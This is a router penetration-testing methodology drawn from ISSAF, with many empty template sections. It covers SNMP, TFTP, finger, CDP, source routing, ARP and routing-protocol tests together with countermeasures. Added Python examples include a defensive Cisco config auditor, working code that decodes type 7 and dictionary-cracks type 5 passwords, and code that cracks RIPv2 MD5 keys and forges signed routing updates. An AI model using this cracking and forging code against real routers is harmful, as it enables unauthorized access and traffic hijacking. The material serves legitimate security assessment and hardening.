Description
Routing Issues
Routing devices direct network traffic, so any router an attacker controls can be used to
intercept, redirect or drop that traffic.
Objective
To assess end-to-end router security, with and/or without prior knowledge of the target
To provide a single point of reference for router security assessment
Technical Requirements
Expected Results
Mis-configuration on router
Password cracking
SNMP insecurities
TFTP insecurities
Methodology / Process
Router Identification
    Port scanning
    OS detection + Versioning
Mis-configurations
VTY/TTY Connections
Exec timeout
HTTP Connections
TFTP
Finger
Password Security
IP Spoofing
ICMP Redirects
ARP Attacks
IRDP
IGRP
EIGRP (Discovery)
Analysis/Conclusion/Observation
Countermeasures
Do not register the router in DNS
Tool[s]
Dig, nslookup, host
Further Reading[s]
Remarks
In practice routers are rarely registered in DNS, so reverse lookups of router addresses
often return nothing.
Service   Protocol   Port
Telnet    TCP        23
HTTP      TCP        80
SNMP      UDP        161
Countermeasures
Tool[s]
Nmap
Further Reading[s]
The following sections of the ISSAF methodology document: port scanning, operating
system scanning, banner grabbing
Remarks
Process
Examples/Results
# nmap -sO <router ip address>
Analysis/Conclusion/Observation
Countermeasures
Only allow the necessary protocols
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Examples/Results
# rat <router-configuration-file>
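An added example, not RAT's code and not part of the ISSAF text, of the kind of checks RAT automates: a small Python auditor that parses a Cisco IOS configuration and flags the mis-configurations this methodology tests (reversible passwords, default or read/write SNMP community strings, source routing, finger, HTTP, CDP, ICMP redirects, directed broadcasts, telnet on VTY lines and disabled exec timeouts). Both configurations are constructed for the example, the `<md5-hash>` placeholders stand in for real type 5 hashes, and the check list is the editor's own selection, not RAT's benchmark rule set.

```python
"""Audit a Cisco IOS configuration for the weaknesses this methodology tests.
Added example; both configurations are constructed, not from a real device."""
import re

WEAK_CONFIG = """\
enable password 7 104D000A0618
username Miguel privilege 15 password 0 romancer
ip finger
ip http server
snmp-server community public RO
snmp-server community private RW
!
interface Ethernet0
 ip directed-broadcast
!
line vty 0 4
 password cisco
 login
 transport input telnet
 exec-timeout 0 0
"""

HARDENED_CONFIG = """\
service password-encryption
enable secret 5 <md5-hash>
username Miguel privilege 15 secret 5 <md5-hash>
no ip source-route
no ip finger
no ip http server
no cdp run
snmp-server community s3cR3t-r0 RO 10
!
interface Ethernet0
 no ip redirects
 no ip directed-broadcast
!
line vty 0 4
 login local
 transport input ssh
 exec-timeout 5 0
"""


def parse_config(text):
    """Split a config into global commands and the indented sub-commands of
    each 'interface ...' / 'line ...' block (IOS indents those by one space)."""
    global_cmds, blocks, current = [], {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("!"):
            current = None
            continue
        if line.startswith(" ") and current is not None:
            blocks[current].append(line.strip())
            continue
        current = None
        global_cmds.append(line)
        if re.match(r"(interface|line) ", line):
            current = line
            blocks[current] = []
    return global_cmds, blocks


def audit(text):
    """Return the list of findings; an empty list means every check passed."""
    global_cmds, blocks = parse_config(text)
    findings = []

    def present(pattern):
        return any(re.match(pattern, cmd) for cmd in global_cmds)

    # Password storage: 'enable secret' is MD5-hashed; 'enable password' and
    # 'username ... password' are type 0 (clear) or type 7 (reversible XOR).
    if present(r"enable password ") and not present(r"enable secret "):
        findings.append("enable password set without enable secret")
    if not present(r"service password-encryption"):
        findings.append("service password-encryption missing")
    for cmd in global_cmds:
        if m := re.match(r"username (\S+) .*\bpassword [07] ", cmd):
            findings.append(f"user {m.group(1)} has a type 0/7 password")
        if m := re.match(r"snmp-server community (\S+) (RO|RW)\b", cmd):
            if m.group(1).lower() in ("public", "private", "ilmi"):
                findings.append(f"default SNMP community {m.group(1)}")
            if m.group(2) == "RW":
                findings.append(f"SNMP write access via community {m.group(1)}")
    # Default-on features: IOS only shows the 'no ...' form once they are off.
    if not present(r"no ip source-route"):
        findings.append("ip source-route not disabled")
    if not (present(r"no ip finger") or present(r"no service finger")):
        findings.append("finger not disabled")
    if present(r"ip http server"):
        findings.append("ip http server enabled")
    if not present(r"no cdp run"):
        findings.append("cdp not disabled")
    for name, cmds in blocks.items():
        if name.startswith("interface "):
            if "no ip redirects" not in cmds:
                findings.append(f"{name}: ip redirects not disabled")
            if "ip directed-broadcast" in cmds:
                findings.append(f"{name}: ip directed-broadcast enabled")
        elif name.startswith("line vty"):
            transport = [c for c in cmds if c.startswith("transport input")]
            if not transport or any(re.search(r"\b(telnet|all)\b", c) for c in transport):
                findings.append(f"{name}: telnet accepted")
            if not any(c.startswith("login") for c in cmds):
                findings.append(f"{name}: no login required")
            if "exec-timeout 0 0" in cmds:
                findings.append(f"{name}: exec-timeout disabled")
    return findings
```

Run `audit(WEAK_CONFIG)` to see the full list of findings for the weak configuration; the hardened one produces none. The checks test for the explicit `no ...` form of default-on features because IOS omits the default from `show running-config`, so a missing line means the feature is still on.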
Analysis/Conclusion/Observation
RAT (the Router Audit Tool) parses the saved configuration file, compares it against a
benchmark of recommended settings and reports every rule that fails.
Countermeasures
Tool[s]
Router Audit Tool (RAT, http://www.cisecurity.org) for Cisco routers
Further Reading[s]
http://www.cisecurity.org
http://www.nsa.gov/notices/notic00004.cfm?Address=/snac/routers/cisco_scg-1.1b.pdf
Remarks
The IP address of the router, if the test is performed from the Internet
The minimum expected result is a login prompt; if the router is not secured, terminal access
will be possible.
Routers operate in several modes. On Cisco IOS the first is user EXEC mode. When you connect
to a VTY (telnet/SSH) or TTY line, the router prompts for the line password if one is
configured. A line configured with "login" but no password refuses the connection; a line
without "login" drops you straight into user mode without any authentication.
In user mode the router displays its hostname followed by the greater-than sign. Example of
user mode access:
TargetRouter>
If you obtain the configuration, collect the password hashes and recover them offline; Cain
decodes type 7 passwords and runs dictionary attacks against type 5 (MD5) hashes.
Commands in user mode are very limited. Enable mode, also known as privileged mode, is
entered by typing the following:
TargetRouter>enable
If no enable password is configured and you get the following prompt:
TargetRouter#
you have fully compromised the router.
If the router prompts you for a password, perform password attacks.
Analysis/Conclusion/Observation
If telnet or rlogin is used:
Countermeasures
Do not allow telnet on the Internet-facing interfaces of routers; use SSH for management.
Configure a console password to authenticate users for user mode access by entering the
following commands:
TargetRouter#configure terminal
TargetRouter(config)#line con 0
TargetRouter(config-line)#password <console password>
TargetRouter(config-line)#login
TargetRouter(config-line)#end
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 10 of 40
Some routers have a local user authentication database, which can be used to authenticate
users who connect directly to the console port of the router. An example of a Cisco router
using local user authentication is as follows:
!
username Miguel privilege 15 password 0 romancer
username Dieter privilege 12 password 0 Pr0mptM@n
username Rama privilege 8 password 0 rEc0n
!
line con 0
login local
transport input none
!
Note that "password 0" stores these passwords in clear text in the configuration; prefer
"username <name> secret <password>", which stores a hash instead.
It is better to use an AAA server for all authentication requests: the router no longer holds
the credentials, and the server keeps a log of every session. Note that only TACACS+ encrypts
the whole exchange between router and server; RADIUS protects just the password field.
Tool[s]
CAIN
http://www.oxid.it/cain.html
telnet, ssh, HyperTerminal
Further Reading[s]
Remarks
Tool[s]
Web browser (e.g. Internet Explorer)
Router Remote Management Tool (e.g. Cisco Secure Policy Manager for Cisco)
Further Reading[s]
Remarks
with an old version of SNMP implemented. Read and write access to routers is available
through it. The usual default strings are "public" (read access) and "private" (read/write
access); the Cisco default string is ILMI.
SNMPv1 is insecure by nature: the community string travels in clear text in every packet, so
a tool like snmpsniff can capture it from the wire.
Pre-requisite[s]
Port 161 UDP is listening and the service is reachable from the attack point
Device IP address
SNMP community string
Process
Outside to Inside approach
Identify the community string (default strings, dictionary guessing or sniffing)
If the read/write ("private") community string has been found, try to retrieve the router
configuration file through TFTP (set up a TFTP server on your system; the classic method
is an SNMP set of the OLD-CISCO-SYS-MIB writeNet object, which makes the router upload its
configuration to your server)
Inside approach
As above; additionally sniff the management segment for community strings in transit
Examples/Results
snmpwalk -v 1 -m all -c <community string> <device ip address> | more
Analysis/Conclusion/Observation
Countermeasures
If the service is not absolutely required, disable it.
Filter SNMP (TCP/UDP 161, 162) traffic at the border router and allow only trusted
management subnets to poll the device.
Treat community strings as carefully as passwords and apply the same best practices.
Use SNMPv3 with message authentication and PDU encryption wherever possible. Note that
SNMPv2c is no improvement here: it still sends the community string in clear text, so only
v3 provides real authentication.
TFTP servers should be placed on the same protected network segment as the devices that
use them.
Remarks
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Analysis/Conclusion/Observation
Finger daemon is running on target system
root user is logged in into the system
Countermeasures
Block the finger port (TCP 79) on the external interface of the router/firewall and disable
the service on the router itself (no service finger / no ip finger).
Process
Use a CDP sniffer to collect the information the router announces through the Cisco
Discovery Protocol (platform, IOS version, interface addresses and VLAN).
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable CDP globally (no cdp run) or on untrusted interfaces (no cdp enable).
Tool[s]
Phenoelit CDP tool (IRPAS)
Further Reading[s]
2004, Balwant Rathore, Open Information Systems Security Group (www.oissg.org)
Date: 11/16/2016
Page 19 of 40
Remarks
A.1.2.10
Description
Refer to the Password Security Assessment section of ISSAF.
Router passwords are stored in the local configuration file. They should be stored as MD5
hashes (Cisco type 5); the older type 7 scheme is only a reversible XOR. Other secrets are in
the file as well (HTTP, SNMP community strings).
Configuration files passed around by e-mail, TFTP or VMPS are vulnerable to sniffing.
Weakly encrypted passwords can be recovered instantly with tools like Lepton's Crack or
Cain; MD5-protected passwords are vulnerable to dictionary attacks.
Pre-requisite[s]
Sniffer
Assessment machine
Process
Sniff the network for configuration files passing in clear text via e-mail, NetBIOS, TFTP
etc.
Decode the encrypted passwords; many times you will find weak encryption (Cisco type 7
passwords)
Examples/Results
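An added worked example, not from the ISSAF text and not the code of Cain or Lepton's Crack, of the two password types named above: type 7 is a fixed-key XOR that decodes instantly, while type 5 is the salted, iterated MD5 ("md5crypt") used by enable secret, which can only be recovered by guessing. The configuration lines and wordlist are constructed here (the type 5 hash is generated by the same code so it is known to be consistent); 104D000A0618 is the standard type 7 test value for the string "cisco".

```python
"""Cisco IOS password storage: type 7 (reversible XOR) and type 5 (salted MD5).
Added example; the configuration lines and the wordlist are constructed."""
import hashlib
import re

# Fixed key stream IOS uses for type 7 ("service password-encryption").
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def type7_decode(encoded):
    """First two digits are the key offset, the rest is hex of plaintext XOR key."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(data)).decode()


def type7_encode(plain, seed=10):
    """The reverse operation, used here only to build sample config lines."""
    return f"{seed:02d}" + bytes(
        ord(c) ^ XLAT[(seed + i) % len(XLAT)] for i, c in enumerate(plain)).hex().upper()


def md5crypt(password, salt):
    """Type 5 / $1$ hash: the md5crypt construction, 1000 MD5 rounds mixing
    password and salt. password and salt are bytes; salt is at most 8 bytes."""
    salt = salt[:8]
    ctx = hashlib.md5(password + b"$1$" + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for i in range(len(password), 0, -16):
        ctx.update(alt[:min(i, 16)])
    i = len(password)
    while i:
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):  # the stretching that makes each guess cost 1000 MD5s
        ctx = hashlib.md5(password if r & 1 else final)
        if r % 3:
            ctx.update(salt)
        if r % 7:
            ctx.update(password)
        ctx.update(final if r & 1 else password)
        final = ctx.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out += ITOA64[v & 0x3F]
            v >>= 6
    v = final[11]
    for _ in range(2):
        out += ITOA64[v & 0x3F]
        v >>= 6
    return "$1$" + salt.decode() + "$" + out


def crack_type5(hashed, wordlist):
    """Dictionary attack: re-hash each candidate with the stored salt."""
    salt = hashed.split("$")[2].encode()
    for word in wordlist:
        if md5crypt(word.encode(), salt) == hashed:
            return word
    return None


def recover_passwords(config, wordlist):
    """Walk a config: decode every type 7 value, try the wordlist on type 5."""
    results = {}
    for line in config.splitlines():
        if m := re.search(r"(password|secret) 7 (\S+)", line):
            results[line.strip()] = type7_decode(m.group(2))
        if m := re.search(r"(password|secret) 5 (\$1\$[^$]+\$\S+)", line):
            results[line.strip()] = crack_type5(m.group(2), wordlist)
    return results


# Constructed sample; the type 5 hash is generated here so it matches the code.
WORDLIST = ["cisco", "router", "rEc0n", "romancer"]
SAMPLE_CONFIG = "\n".join([
    "enable password 7 104D000A0618",
    "enable secret 5 " + md5crypt(b"rEc0n", b"Ab3dEf9h"),
    "username Dieter password 7 " + type7_encode("Pr0mptM@n"),
])
```

`recover_passwords(SAMPLE_CONFIG, WORDLIST)` returns the plaintext for every line. The contrast is the point of the countermeasures below: type 7 falls to a table lookup no matter how long the password is, whereas type 5 only falls if the password is in the attacker's wordlist.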
Analysis/Conclusion/Observation
Countermeasures
Configure "enable secret" so that the enable password is stored as an MD5 hash (Cisco
routers)
Configure "service password-encryption" for the other passwords (this only applies the
reversible type 7 scheme, so it hides passwords from onlookers, not from an attacker who
obtains the file)
Tool[s]
Lepton's Crack
CAIN
Sniffer
Remarks
A.1.2.11
Description
Source routing lets the sender define the path a packet takes (outbound and return) inside
the packet itself. It comes in two forms: 1. loose source routing and 2. strict source
routing.
Loose source routing: some hops (routing devices) on the path are specified; the rest of the
path is chosen as usual.
Strict source routing: every hop (routing device) on the path is specified, from start to end.
Pre-requisite[s]
Packet crafter
Examples/Results
Use the ping utility with the source-routing options (on Windows: ping -j <hosts> for loose
and ping -k <hosts> for strict source routing) and check whether the router forwards the
packets.
Analysis/Conclusion/Observation
Countermeasures
Disable processing of source-routed packets on the router with "no ip source-route"; this
covers both loose and strict source routing. ("no ip redirects" is a separate control for
ICMP redirects and does not affect source routing.)
Tool[s]
ping
Netcat
VSR
Further Reading[s]
Remarks
A.1.2.12
TEST IP SPOOFING
Description
By using IP spoofing an attacker can circumvent IP access control lists (mostly configured
on routers) by assuming someone else's identity.
Several techniques are available for IP spoofing, for example:
Source routing
On the router, a packet carrying an internal source address that arrives on the external
interface is considered a spoofed packet.
This test is only meaningful if ACLs are used on the router; if no access control lists are
configured, IP spoofing is certainly possible and the test adds little.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Create an access control list on the router which denies packets with internal source IP
addresses arriving on the external interface (and, where supported, enable unicast reverse
path forwarding with "ip verify unicast reverse-path").
Limitation
Tool[s]
Further Reading[s]
Remarks
A.1.2.13
A.1.2.14
Description
ICMP Redirects allows an attacker to manipulate host routing tables. An ICMP redirect
can specify a new gateway for specific networks.
Pre-requisite[s]
Icmp_redir
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Configure "no ip redirects" on each interface of the router (interface configuration mode).
Tool[s]
icmp_redir
Further Reading[s]
http://www.insecure.org/sploits/arp.games.html
Remarks
A.1.2.15
Description
In switched networks frames are forwarded by MAC address, so each host normally sees only
the traffic addressed to it. Gratuitous ARP is used by hosts to announce their IP address;
it is a broadcast packet like an ARP request. Manipulation of a host's ARP cache makes
man-in-the-middle attacks possible. Test whether ARP spoofing is possible against this
router.
Pre-requisite[s]
ARP cache poisoning tool: Ettercap or Dsniff 1.3
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Hard-code static ARP entries for critical hosts (the gateway/server entries on the router
and the router's entry on the gateway/server(s))
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Process
Hash gathering and password cracking when MD5 authentication is used. Both routers share
the same secret key; the key is appended to the routing message, MD5 is computed over the
result, and the digest is sent with the message. Capturing such updates requires a
man-in-the-middle position on the routing segment.
A dictionary attack, followed by brute force, is used to recover the shared key so that
routing updates can be forged and modified (the updates themselves are not encrypted and
can be read without the key).
Examples/Results
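An added example, not from the ISSAF text, of the keyed-MD5 RIPv2 authentication described above, following the RFC 2082 construction: the sender appends the shared key (zero-padded, at most 16 bytes, longer keys truncated here) to the packet and replaces it with the MD5 digest; the receiver repeats the computation with its own copy of the key. The dictionary attack is what an attacker holding one captured update does: recompute the digest with each candidate key until one matches, after which forged updates can be signed. The routing update and wordlist are constructed; the key string is the one from the key-chain configuration in the countermeasures below.

```python
"""RIPv2 keyed-MD5 authentication (RFC 2082) and the dictionary attack on it.
Added example; the routing update and the wordlist are constructed."""
import hashlib
import hmac
import socket
import struct

KEY_LEN = 16  # RFC 2082 keys are at most 16 bytes and are zero-padded


def _route(prefix, mask, next_hop, metric):
    """One 20-byte RIPv2 route entry (AFI 2 = IP)."""
    return struct.pack(">HH4s4s4sI", 2, 0, socket.inet_aton(prefix),
                       socket.inet_aton(mask), socket.inet_aton(next_hop), metric)


def _digest(body, key):
    """MD5 over the packet with the padded key in place of the digest."""
    return hashlib.md5(body + key[:KEY_LEN].ljust(KEY_LEN, b"\0")).digest()


def build_update(routes, key, key_id=1, seq=1):
    """Sender side: header, authentication header entry, routes, trailer."""
    header = struct.pack(">BBH", 2, 2, 0)          # command 2 = response, version 2
    entries = b"".join(_route(*r) for r in routes)
    offset = len(header) + 20 + len(entries)       # where the trailer starts
    auth = struct.pack(">HHHBBI8s", 0xFFFF, 3, offset, key_id, KEY_LEN, seq, b"\0" * 8)
    body = header + auth + entries + struct.pack(">HH", 0xFFFF, 1)
    return body + _digest(body, key)


def verify(packet, key):
    """Receiver side: recompute the digest and compare in constant time."""
    body, digest = packet[:-KEY_LEN], packet[-KEY_LEN:]
    return hmac.compare_digest(_digest(body, key), digest)


def routes_in(packet):
    """Decode the route entries; they are readable without any key."""
    out = []
    for pos in range(24, len(packet) - 20, 20):
        afi, _, pfx, mask, nh, metric = struct.unpack(">HH4s4s4sI", packet[pos:pos + 20])
        if afi == 2:
            out.append((socket.inet_ntoa(pfx), socket.inet_ntoa(mask),
                        socket.inet_ntoa(nh), metric))
    return out


def crack_key(packet, wordlist):
    """Dictionary attack: one MD5 per candidate, no interaction with the routers."""
    for word in wordlist:
        if verify(packet, word.encode()):
            return word
    return None


def forge(packet, wordlist, new_routes):
    """Once the key is known, sign an update carrying attacker-chosen routes."""
    key = crack_key(packet, wordlist)
    if key is None:
        return None
    key_id, seq = struct.unpack(">BxI", packet[10:16])  # from the auth header entry
    return build_update(new_routes, key.encode(), key_id, seq + 1)
```

`crack_key` costs one MD5 per guess, which is why the countermeasures insist on a strong key and a limited lifetime: the sequence number only stops replay of old updates, it does nothing against an attacker who has recovered the key and signs fresh ones.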
Analysis/Conclusion/Observation
Countermeasures
RIP version 1 has no authentication at all and is not suitable from a security point of
view. RIP version 2 routing updates with clear-text authentication can be easily broken,
since the password is visible on the wire. Hence MD5 authentication should be used, and the
shared secret should be strong and have a definite lifetime so that it cannot be broken
easily. Configuration is as follows:
Central(config)# key chain asdf
Central(config-keychain)# key 1
Central(config-keychain-key)# key-string asdaaajas-a431
Central(config-keychain-key)# exit
Central(config-keychain)# key 2
Central(config-keychain-key)# key-string khfhgdsdj-16allsd-32hsa
Central(config-keychain-key)# end
The key chain must then be applied on every interface that runs RIP:
Central(config)# interface <interface>
Central(config-if)# ip rip authentication mode md5
Central(config-if)# ip rip authentication key-chain asdf
Tool[s]
L0phtCrack, John the Ripper
Further Reading[s]
Routing TCP/IP, Volume I, by Jeff Doyle
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
The sessions can be protected with anti-spoofing filters and the TCP MD5 signature option
(RFC 2385) password protection.
Tool[s]
Further Reading[s]
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Some registry entries must be changed on the systems running these protocols, depending on
the OS.
E.g. Windows 98/ME:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\000n (where "000n"
is the entry whose "DriverDesc" value is TCP/IP)
PerformRouterDiscovery = 0 (DWORD value)
Windows 2000:
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\<interface>
PerformRouterDiscovery = 0 (REG_DWORD, range 0-2: 0 = disabled, 1 = enabled,
2 = enabled only if DHCP sends the router discovery option)
Tool[s]
Further Reading[s]
Remarks
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Malformed packets
Packet floods
Network-based denial of service attacks fall into two categories: 1. malformed packet
attacks and 2. packet flood attacks.
Malformed packet attacks: the attacker sends a single packet or a small stream of packets
to the target, formed in a way the developers of the target did not anticipate. The system
is not designed to handle such strangely formed packets, which may crash it (e.g. ping of
death).
Packet flood attacks: the attacker sends more packets than the destination can process
(e.g. SYN floods).
Also, packets dropped by access control lists are generally not seen by a network intrusion
detection system, so it is recommended to log ACL denies on the router.
A.2.10
Directed broadcasts are used extensively in denial of service attacks including smurf. It
is recommended that IP directed broadcasts are dropped by the router ("no ip
directed-broadcast" on each interface) to prevent it from acting as an amplifier for
distributed denial of service attacks.
A.2.11
Limit ICMP
Several denial of service attacks use the ICMP protocol. The types of ICMP messages allowed
should be limited. At a minimum, in order to allow Path MTU discovery (PMTUD), permit
"packet too big" messages (type 3, code 4: fragmentation needed). The other ICMP types can
be disabled.
A.2.12
A.2.13
Reflexive access lists to prevent connection hijacking on the Internet router
A.2.14
Use CBAC
Use CBAC on intranet and extranet routers where you do not have a dedicated firewall
(CBAC, Context-Based Access Control, filters TCP and UDP sessions statefully using
application-layer protocol information).
A.2.15
A.2.16
Use authentication proxy and AAA in case you do not have a separate proxy server.